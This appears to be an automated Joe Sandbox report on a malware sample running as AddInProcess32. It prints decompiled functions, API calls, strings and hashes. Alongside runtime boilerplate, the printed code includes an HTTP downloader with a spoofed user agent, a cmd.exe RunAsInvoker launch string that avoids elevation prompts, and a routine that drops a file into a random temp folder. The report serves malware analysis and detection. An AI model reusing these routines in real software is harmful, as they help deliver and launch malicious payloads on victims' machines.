Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: Internet$CloseHandleHttpOpenRequest$FileOptionRead$ConnectCrackHeaderswsprintf
String ID: Chrome$GET$HEAD$HTTP/1.1$RANGE:bytes=%d-%d
API String ID: 4118762141-3869934866
Opcode ID: 2f081c35ce287324ec70b487f6287b97d1f4efeb2ee54161e5e9e299d1b3be2e
Instruction ID: e1e8a25234caeff5c0fbdc1371093facd1f167fe6724d8f740674b39965c3d8d
Opcode Fuzzy Hash: 2f081c35ce287324ec70b487f6287b97d1f4efeb2ee54161e5e9e299d1b3be2e
Instruction Fuzzy Hash: 0F815F719416399BDB35DF15CC99BAABBB8EF09752F0000DAE909A7240DB309AC4CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00406798 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406798(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x4144f0 = GetProcAddress(_t37, "FlsAlloc");
					 *0x4144f4 = GetProcAddress(_t37, "FlsGetValue");
					 *0x4144f8 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x4144f0;
					_t40 = TlsSetValue;
					 *0x4144fc = _t7;
					if( *0x4144f0 == 0) {
						L6:
						 *0x4144f4 = TlsGetValue;
						 *0x4144f0 = E004064B1;
						 *0x4144f8 = _t40;
						 *0x4144fc = TlsFree;
					} else {
						__eflags =  *0x4144f4;
						if( *0x4144f4 == 0) {
							goto L6;
						} else {
							__eflags =  *0x4144f8;
							if( *0x4144f8 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x4138c4 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x4144f4);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00406C99();
							 *0x4144f0 = E004063CC( *0x4144f0);
							 *0x4144f4 = E004063CC( *0x4144f4);
							 *0x4144f8 = E004063CC( *0x4144f8);
							 *0x4144fc = E004063CC( *0x4144fc);
							_t18 = E00403DE2(_t30, _t37);
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E004064EC(_t30, _t37);
								goto L15;
							} else {
								_push(E00406677);
								_t21 =  *((intOrPtr*)(E00406443( *0x4144f0)))();
								__eflags = _t21 - 0xffffffff;
								 *0x4138c0 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00407C87(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x4138c0);
										__eflags =  *((intOrPtr*)(E00406443( *0x4144f8)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00406529(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E004064EC(__ebx, _t37);
					return 0;
				}
			}

0x00406798
0x004067a4
0x004067a8
0x004067c8
0x004067d5
0x004067e2
0x004067e7
0x004067e9
0x004067f0
0x004067f6
0x004067fb
0x00406813
0x00406818
0x00406822
0x0040682c
0x00406832
0x004067fd
0x004067fd
0x00406804
0x00000000
0x00406806
0x00406806
0x0040680d
0x00000000
0x0040680f
0x0040680f
0x00406811
0x00000000
0x00000000
0x00406811
0x0040680d
0x00406804
0x00406837
0x0040683d
0x00406840
0x00406845
0x00406917
0x00406917
0x00406917
0x0040684b
0x00406852
0x00406854
0x00406856
0x00000000
0x0040685c
0x0040685c
0x00406872
0x00406882
0x00406892
0x0040689f
0x004068a4
0x004068a9
0x004068ab
0x00406912
0x00406912
0x00000000
0x004068ad
0x004068ad
0x004068be
0x004068c0
0x004068c3
0x004068c8
0x00000000
0x004068ca
0x004068d6
0x004068d8
0x004068dc
0x00000000
0x004068de
0x004068de
0x004068df
0x004068f3
0x004068f5
0x00000000
0x004068f7
0x004068f7
0x004068f9
0x004068fa
0x00406901
0x00406907
0x0040690b
0x0040690f
0x0040690f
0x004068f5
0x004068dc
0x004068c8
0x004068ab
0x00406856
0x0040691b
0x004067aa
0x004067aa
0x004067b2
0x004067b2

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00403AA8), ref: 0040679E
__mtterm.LIBCMT ref: 004067AA

Part of subcall function 004064EC: TlsFree.KERNEL32(FFFFFFFF,00406917), ref: 00406517

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004067C0
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004067CD
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004067DA
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004067E7
TlsAlloc.KERNEL32 ref: 00406837
TlsSetValue.KERNEL32(00000000), ref: 00406852
__init_pointers.LIBCMT ref: 0040685C
__calloc_crt.LIBCMT ref: 004068D1
GetCurrentThreadId.KERNEL32 ref: 00406901

Strings

KERNEL32.DLL, xrefs: 00406799
FlsAlloc, xrefs: 004067BA
FlsFree, xrefs: 004067DC
FlsSetValue, xrefs: 004067CF
FlsGetValue, xrefs: 004067C2

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 630932248-3819984048
Opcode ID: 59697e22f0d555e3b7d3cb8a22637ef6e66e256eaa5b52333f5b32bc99484974
Instruction ID: 7c5ed862ad4e46ccbc4200316f1e50c4686e51c2e14fc2ae8d4e83c3db53f4cc
Opcode Fuzzy Hash: 59697e22f0d555e3b7d3cb8a22637ef6e66e256eaa5b52333f5b32bc99484974
Instruction Fuzzy Hash: 023166B19003129AD7107FB9BD05B863AA4ABC0724B12853BF821BB2F1DB399554CF7D

Uniqueness

Uniqueness Score: -1.00%

Function 00402F60 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 160
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402F60(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				intOrPtr* _t45;
				void* _t52;
				void* _t53;
				void* _t56;
				void* _t64;
				intOrPtr* _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t82;
				intOrPtr _t87;
				void* _t88;
				short* _t89;
				void* _t92;
				WCHAR* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				intOrPtr _t100;
				signed int _t101;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;

				_t68 = __ebx;
				_t39 =  *0x413004; // 0x98fc836b
				 *(_t104 + 0x628) = _t39 ^ _t104;
				_t100 =  *((intOrPtr*)(_t104 + 0x634));
				_push(_t88);
				_t94 = __edx;
				 *((intOrPtr*)(_t104 + 0x24)) = _t100;
				 *((intOrPtr*)(_t104 + 0x20)) =  *((intOrPtr*)(_t104 + 0x638));
				 *((intOrPtr*)(_t104 + 0x1c)) = __ecx;
				 *((short*)(_t104 + 0x28)) = 0;
				E00409280(_t88, _t104 + 0x22, 0, 0x206);
				_t105 = _t104 + 0xc;
				 *((char*)(_t105 + 0x1b)) = 0;
				GetShortPathNameW(_t94, _t105 + 0x20, 0x104);
				_t45 = _t105 + 0x1c;
				_t70 = _t45 + 2;
				do {
					_t82 =  *_t45;
					_t45 = _t45 + 2;
				} while (_t82 != 0);
				_t71 = 2;
				_t95 = (_t45 - _t70 >> 1) + 1;
				if(__ebx > 2) {
					do {
						_t65 =  *((intOrPtr*)(_t100 + _t71 * 4));
						_t92 = _t65 + 2;
						do {
							_t87 =  *_t65;
							_t65 = _t65 + 2;
						} while (_t87 != 0);
						_t71 = _t71 + 1;
						_t95 = _t95 + (_t65 - _t92 >> 1) + 1;
					} while (_t71 < _t68);
				}
				GetModuleFileNameW(0, _t105 + 0x228, 0x104);
				GetShortPathNameW(_t105 + 0x22c, _t105 + 0x430, 0x104);
				if( *((char*)(_t105 + 0x640)) == 0) {
					_t96 = _t95 + 0x14;
				} else {
					_t96 = _t95 + 0x30;
				}
				_t89 = LocalAlloc(0, _t96 + _t96);
				if(_t89 != 0) {
					 *_t89 = 0;
					_t52 = E00403926(_t105 + 0x1c, 0x104);
					_t106 = _t105 + 8;
					if( *((char*)(_t106 + 0x640)) == 0) {
						_t53 = E0040360D(_t106 + 0x1c, L".msc");
						_t106 = _t106 + 8;
						if(_t53 != 0) {
							E004036E5(_t53, _t89, _t96, L"cmd.exe /c \"start ");
							 *((char*)( *((intOrPtr*)(_t106 + 0x1c)))) = 1;
							goto L16;
						}
					} else {
						E004036E5(_t52, _t89, _t96, L"cmd.exe /c \"set __COMPAT_LAYER=RunAsInvoker &&");
						 *((char*)( *((intOrPtr*)(_t106 + 0x1c)))) = 1;
						L16:
						 *((char*)(_t106 + 0x1b)) = 1;
						_t106 = _t106 + 0xc;
					}
					_t56 = E0040366B(E0040366B(_t106 + 0x1c, _t89, _t96, _t106 + 0x1c), _t89, _t96, 0x4118f0);
					_t101 = 2;
					_t107 = _t106 + 0x18;
					if(_t68 > 2) {
						do {
							_t56 = E0040366B(E0040366B(_t56, _t89, _t96,  *((intOrPtr*)( *(_t107 + 0x18) + _t101 * 4))), _t89, _t96, 0x4118f0);
							_t101 = _t101 + 1;
							_t107 = _t107 + 0x18;
						} while (_t101 < _t68);
					}
					if( *((char*)(_t107 + 0xf)) != 0) {
						E0040366B(_t56, _t89, _t96, 0x4118f4);
						_t107 = _t107 + 0xc;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x14)))) = _t89;
					_pop(_t97);
					E0040318A(0, _t68,  *(_t107 + 0x634) ^ _t107, _t97);
					return 0;
				} else {
					_t24 = _t89 + 8; // 0x8
					_t64 = _t24;
					_pop(_t98);
					E0040318A(_t64, _t68,  *(_t105 + 0x628) ^ _t105, _t98);
					return _t64;
				}
			}

0x00402f60
0x00402f66
0x00402f6d
0x00402f7c
0x00402f84
0x00402f8a
0x00402f93
0x00402f97
0x00402f9b
0x00402f9f
0x00402fa6
0x00402fab
0x00402fb9
0x00402fbe
0x00402fc4
0x00402fc8
0x00402fd0
0x00402fd0
0x00402fd3
0x00402fd6
0x00402fdf
0x00402fe6
0x00402fe9
0x00402ff0
0x00402ff0
0x00402ff4
0x00402ff7
0x00402ff7
0x00402ffa
0x00402ffd
0x00403006
0x0040300b
0x0040300b
0x00402ff0
0x00403020
0x0040303b
0x00403049
0x00403050
0x0040304b
0x0040304b
0x0040304b
0x0040305f
0x00403063
0x0040308a
0x0040308f
0x00403094
0x0040309f
0x004030c0
0x004030c5
0x004030ca
0x004030d3
0x004030dc
0x00000000
0x004030dc
0x004030a1
0x004030a8
0x004030b1
0x004030df
0x004030df
0x004030e4
0x004030e4
0x004030fa
0x004030ff
0x00403104
0x00403109
0x00403110
0x00403126
0x0040312b
0x0040312e
0x00403131
0x00403110
0x0040313a
0x00403143
0x00403148
0x00403148
0x00403156
0x00403159
0x0040315f
0x0040316a
0x00403065
0x00403065
0x00403065
0x00403069
0x00403074
0x0040307f
0x0040307f

APIs

_memset.LIBCMT ref: 00402FA6
GetShortPathNameW.KERNEL32 ref: 00402FBE
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403020
GetShortPathNameW.KERNEL32 ref: 0040303B
LocalAlloc.KERNEL32(00000000), ref: 00403059

Strings

.msc, xrefs: 004030BA
cmd.exe /c "set __COMPAT_LAYER=RunAsInvoker &&, xrefs: 004030A1
cmd.exe /c "start , xrefs: 004030CC

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: Name$PathShort$AllocFileLocalModule_memset
String ID: .msc$cmd.exe /c "set __COMPAT_LAYER=RunAsInvoker &&$cmd.exe /c "start
API String ID: 3786246004-2437571064
Opcode ID: 4fa69a20af8ed9328d554935d36f2ab083722ec717f1d2048d50260163dd52f2
Instruction ID: de00689b0eb6e5bdbbfd2616fea31aee9d38f1499e5edb8031d74eed1a826148
Opcode Fuzzy Hash: 4fa69a20af8ed9328d554935d36f2ab083722ec717f1d2048d50260163dd52f2
Instruction Fuzzy Hash: F4511671504301ABC320EF55CC46BAB7BE8AFD5309F04482EF549A32C1E7799648C7AB

Uniqueness

Uniqueness Score: -1.00%

Function 02B53905 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 116
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02B53905(intOrPtr __ecx, WCHAR* __edx, WCHAR* _a4, short _a8) {
				void _v8;
				long _v12;
				long _v16;
				void _v20;
				intOrPtr _v24;
				long _v28;
				void* _v32;
				void* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				void* _t29;
				void* _t55;
				void* _t59;
				WCHAR* _t60;

				_t60 = 0;
				_v44 = L"text/*";
				_v12 = 0;
				_v24 = __ecx;
				_v28 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				_v40 = 0;
				_t29 = InternetOpenW(L"Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413", 0, 0, 0, 0);
				_v36 = _t29;
				if(_t29 != 0) {
					_t55 = InternetConnectW(_t29, __edx, _a8, 0x2b542bc, 0x2b542bc, 3, 0, 0);
					_v32 = _t55;
					if(_t55 != 0) {
						_t34 =  !=  ? 0x84803000 : 0x84003000;
						_v8 =  !=  ? 0x84803000 : 0x84003000;
						_t59 = HttpOpenRequestW(_t55, L"GET", _a4, L"HTTP/1.1", 0,  &_v44, 0x84003000, 0);
						if(_t59 != 0) {
							if(_v24 != 0) {
								_v12 = 4;
								InternetQueryOptionW(_t59, 0x1f,  &_v8,  &_v12);
								_v8 = _v8 | 0x00000080;
								InternetSetOptionW(_t59, 0x1f,  &_v8, 4);
							}
							_t60 = HttpSendRequestW(_t59, _t60, _t60, _t60, _t60);
							if(_t60 != 0) {
								_v16 = 4;
								_t60 = HttpQueryInfoW(_t59, 0x20000013,  &_v20,  &_v16,  &_v28);
								if(_t60 != 0) {
									_t60 =  !=  ? 0 : _t60;
								}
							} else {
								GetLastError();
							}
							InternetCloseHandle(_t59);
						}
						InternetCloseHandle(_v32);
					}
					InternetCloseHandle(_v36);
				}
				return _t60;
			}

0x02b5390d
0x02b5390f
0x02b5391d
0x02b53927
0x02b5392a
0x02b5392d
0x02b53930
0x02b53933
0x02b53936
0x02b53939
0x02b5393f
0x02b53944
0x02b53966
0x02b53968
0x02b5396d
0x02b53980
0x02b53984
0x02b539a0
0x02b539a4
0x02b539ad
0x02b539b2
0x02b539c1
0x02b539c7
0x02b539d7
0x02b539d7
0x02b539e8
0x02b539ec
0x02b539f9
0x02b53a15
0x02b53a19
0x02b53a24
0x02b53a24
0x02b539ee
0x02b539ee
0x02b539ee
0x02b53a28
0x02b53a28
0x02b53a2d
0x02b53a2d
0x02b53a32
0x02b53a32
0x02b53a3c

APIs

InternetOpenW.WININET(Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413,00000000,00000000,00000000,00000000), ref: 02B53939
InternetConnectW.WININET(00000000,?,?,02B542BC,02B542BC,00000003,00000000,00000000), ref: 02B5395A
HttpOpenRequestW.WININET(00000000,GET,?,HTTP/1.1,00000000,02B54624,84003000,00000000), ref: 02B5399A
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 02B539C1
InternetSetOptionW.WININET(00000000,0000001F,00000080,00000004), ref: 02B539D7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02B539E2
GetLastError.KERNEL32(?,?,02B542BC,02B542BC,00000003,00000000,00000000,?,?,00000000), ref: 02B539EE
HttpQueryInfoW.WININET(00000000,20000013,?,00000004,?), ref: 02B53A0F
InternetCloseHandle.WININET(00000000), ref: 02B53A28
InternetCloseHandle.WININET(?), ref: 02B53A2D
InternetCloseHandle.WININET(?), ref: 02B53A32

Strings

text/*, xrefs: 02B5390F
HTTP/1.1, xrefs: 02B5398C
GET, xrefs: 02B53994
Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413, xrefs: 02B53920

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: Internet$CloseHandleHttp$OpenOptionQueryRequest$ConnectErrorInfoLastSend
String ID: GET$HTTP/1.1$Mozilla / 5.0 (SymbianOS / 9.1; U; [en]; SymbianOS / 91 Series60 / 3.0) AppleWebkit / 413 (KHTML, like Gecko) Safari / 413$text/*
API String ID: 549917901-3682974978
Opcode ID: 1c2d5226e3a0a79d90000d2fdfc296e1e615a2324ca35ac5e79ab94bf20b8545
Instruction ID: 8b1cb4974245ab8e90440c2ac24a5659eddd1b59160cf91b14455d657b57d53e
Opcode Fuzzy Hash: 1c2d5226e3a0a79d90000d2fdfc296e1e615a2324ca35ac5e79ab94bf20b8545
Instruction Fuzzy Hash: 65310BB1D51229BBEB118F959C49BEFBEFCEF49694F00419AF905E6240D7708A409BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 164
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 42%

			E0040AF20(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				signed char _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				intOrPtr* _t31;
				intOrPtr* _t34;
				intOrPtr _t35;
				intOrPtr* _t37;
				void* _t41;
				void* _t43;
				intOrPtr _t48;
				intOrPtr _t50;
				void* _t54;
				intOrPtr _t56;
				intOrPtr _t61;
				void* _t67;
				void* _t71;
				void* _t74;
				intOrPtr* _t75;
				struct HINSTANCE__* _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;

				_t74 = __edx;
				_v12 = E0040643A();
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				if( *0x4149b8 != 0) {
					L8:
					_t29 =  *0x4149c4;
					_t61 = _v12;
					if( *0x4149c4 == _t61 ||  *0x4149c8 == _t61) {
						L20:
						_t30 =  *0x4149bc;
						if( *0x4149bc != _v12) {
							_t34 = E00406443(_t30);
							if(_t34 != 0) {
								_t35 =  *_t34();
								_v8 = _t35;
								if(_t35 != 0) {
									_t36 =  *0x4149c0;
									if( *0x4149c0 != _v12) {
										_t37 = E00406443(_t36);
										if(_t37 != 0) {
											_v8 =  *_t37(_v8);
										}
									}
								}
							}
						}
						goto L26;
					} else {
						_t77 = E00406443(_t29);
						_t75 = E00406443( *0x4149c8);
						if(_t77 == 0 || _t75 == 0) {
							goto L20;
						} else {
							_t41 =  *_t77();
							if(_t41 == 0) {
								L15:
								_t43 = E00406AA9( &_v20);
								_pop(_t67);
								if(_t43 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E00405700(0, _t67, _t74, _t75);
								}
								if(_v20 < 4) {
									_a12 = _a12 | 0x00040000;
								} else {
									_a12 = _a12 | 0x00200000;
								}
								L26:
								_t31 = E00406443( *0x4149b8);
								if(_t31 == 0) {
									L28:
									return 0;
								}
								return  *_t31(_v8, _a4, _a8, _a12);
							}
							_push( &_v24);
							_push(0xc);
							_push( &_v36);
							_push(1);
							_push(_t41);
							if( *_t75() == 0 || (_v28 & 0x00000001) == 0) {
								goto L15;
							} else {
								goto L20;
							}
						}
					}
				}
				_t76 = LoadLibraryA("USER32.DLL");
				if(_t76 == 0 || GetProcAddress(_t76, "MessageBoxA") == 0) {
					goto L28;
				} else {
					_t48 = E004063CC(_t47);
					 *_t79 = "GetActiveWindow";
					 *0x4149b8 = _t48;
					_t50 = E004063CC(GetProcAddress(??, ??));
					 *_t79 = "GetLastActivePopup";
					 *0x4149bc = _t50;
					 *0x4149c0 = E004063CC(GetProcAddress(_t76, _t76));
					_t54 = E00406A72( &_v16,  &_v16);
					_pop(_t71);
					if(_t54 != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00405700(0, _t71, _t74, _t76);
						_t79 = _t79 + 0x14;
					}
					if(_v16 == 2) {
						_t56 = E004063CC(GetProcAddress(_t76, "GetUserObjectInformationA"));
						 *0x4149c8 = _t56;
						if(_t56 != 0) {
							 *0x4149c4 = E004063CC(GetProcAddress(_t76, "GetProcessWindowStation"));
						}
					}
					goto L8;
				}
			}

0x0040af20
0x0040af36
0x0040af39
0x0040af3c
0x0040af3f
0x0040af42
0x0040aff6
0x0040aff6
0x0040affb
0x0040b000
0x0040b07b
0x0040b07b
0x0040b083
0x0040b086
0x0040b08e
0x0040b090
0x0040b094
0x0040b097
0x0040b099
0x0040b0a1
0x0040b0a4
0x0040b0ac
0x0040b0b3
0x0040b0b3
0x0040b0ac
0x0040b0a1
0x0040b097
0x0040b08e
0x00000000
0x0040b00a
0x0040b016
0x0040b021
0x0040b023
0x00000000
0x0040b029
0x0040b029
0x0040b02d
0x0040b048
0x0040b04c
0x0040b053
0x0040b054
0x0040b056
0x0040b057
0x0040b058
0x0040b059
0x0040b05a
0x0040b05b
0x0040b060
0x0040b067
0x0040b072
0x0040b069
0x0040b069
0x0040b069
0x0040b0b6
0x0040b0bc
0x0040b0c4
0x0040b0d6
0x00000000
0x0040b0d6
0x00000000
0x0040b0d2
0x0040b032
0x0040b033
0x0040b038
0x0040b039
0x0040b03b
0x0040b040
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b040
0x0040b023
0x0040b000
0x0040af53
0x0040af57
0x00000000
0x0040af73
0x0040af74
0x0040af79
0x0040af81
0x0040af89
0x0040af8e
0x0040af96
0x0040afa3
0x0040afac
0x0040afb4
0x0040afb5
0x0040afb7
0x0040afb8
0x0040afb9
0x0040afba
0x0040afbb
0x0040afbc
0x0040afc1
0x0040afc1
0x0040afc8
0x0040afd3
0x0040afdb
0x0040afe0
0x0040aff1
0x0040aff1
0x0040afe0
0x00000000
0x0040afc8

APIs

LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 0040AF4D
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040AF69

Part of subcall function 004063CC: TlsGetValue.KERNEL32(00000000,00406441,00000000,0040AF2E,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063D9
Part of subcall function 004063CC: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063F0

GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF86

Part of subcall function 004063CC: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 00406405
Part of subcall function 004063CC: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406420

GetProcAddress.KERNEL32(00000000,00000000), ref: 0040AF9B
__invoke_watson.LIBCMT ref: 0040AFBC

Part of subcall function 00405700: _memset.LIBCMT ref: 0040578C
Part of subcall function 00405700: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004057AA
Part of subcall function 00405700: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004057B4
Part of subcall function 00405700: UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 004057BE
Part of subcall function 00405700: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004057D9
Part of subcall function 00405700: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 004057E0

Part of subcall function 00406443: TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
Part of subcall function 00406443: TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467

Part of subcall function 00406443: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647C
Part of subcall function 00406443: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406497

GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0040AFD0
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040AFE8
__invoke_watson.LIBCMT ref: 0040B05B

Strings

GetLastActivePopup, xrefs: 0040AF8E
GetActiveWindow, xrefs: 0040AF79
USER32.DLL, xrefs: 0040AF48
GetProcessWindowStation, xrefs: 0040AFE2
GetUserObjectInformationA, xrefs: 0040AFCA
MessageBoxA, xrefs: 0040AF63

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 2940365033-232180764
Opcode ID: 9dc9d6c9699a12b4101e6e517c17312217e972a6e614ab9b554892a8391cc6b4
Instruction ID: 1c028cbe132dd73ef92918e8f78929fa75bbb1dd901022f9e38424cc5d2cf97e
Opcode Fuzzy Hash: 9dc9d6c9699a12b4101e6e517c17312217e972a6e614ab9b554892a8391cc6b4
Instruction Fuzzy Hash: E94164B1D05205AACF20AFB59C85D6FBBA8EE44314F11493FE811F22D1DB3D89548B9E

Uniqueness

Uniqueness Score: -1.00%

Function 02B52AC6 Relevance: 21.1, APIs: 14, Instructions: 135
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E02B52AC6(void* __ebx, WCHAR* __ecx, void* __edx, void* __edi, void* __esi, long _a4) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1568;
				long _v1572;
				void* _v1576;
				WCHAR* _v1580;
				signed int _t38;
				long _t83;
				WCHAR* _t84;
				void* _t96;
				void* _t97;
				void* _t101;
				void* _t106;
				signed int _t111;

				_t38 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t38 ^ _t111;
				_v1576 = __edx;
				_v1580 = __ecx;
				if(GetTempPathW(0x104,  &_v1568) != 0) {
					_t96 = 8;
					E02B52A57( &_v528, _t96);
					PathAppendW( &_v1568,  &_v528);
					do {
						_t97 = 0xa;
						_v528 = 0;
						_v1048 = 0;
						E02B52A57( &_v528, _t97);
						E02B52C9C( &_v1048,  &_v1568);
						StrCatW( &_v1048,  &_v528);
					} while (PathFileExistsW( &_v1048) != 0);
					E02B52C9C( &_v1568,  &_v1048);
					CreateDirectoryW( &_v1568, 0);
					if(PathFileExistsW( &_v1568) != 0) {
						_v528 = 0;
						E02B52C9C( &_v528,  &_v1568);
						_t101 = 6;
						E02B52A57( &_v1048, _t101);
						PathAppendW( &_v528,  &_v1048);
						DeleteFileW( &_v528);
						_t106 = CreateFileW( &_v528, 0x10000000, 0, 0, 2, 0, 0);
						if(_t106 == 0xffffffff) {
							goto L8;
						} else {
							_t83 = _a4;
							_v1572 = 0;
							if(WriteFile(_t106, _v1576, _t83,  &_v1572, 0) == 0 || _v1572 != _t83) {
								CloseHandle(_t106);
								goto L8;
							} else {
								__imp__GetLongPathNameW( &_v528,  &_v1048, 0x104);
								_t84 = _v1580;
								E02B52C9C(_t84,  &_v1048);
								if(PathFileExistsW(_t84) != 0) {
								}
								CloseHandle(_t106);
							}
						}
					}
				}
				return E02B53C33(_v8 ^ _t111);
			}

0x02b52acf
0x02b52ad6
0x02b52adf
0x02b52aeb
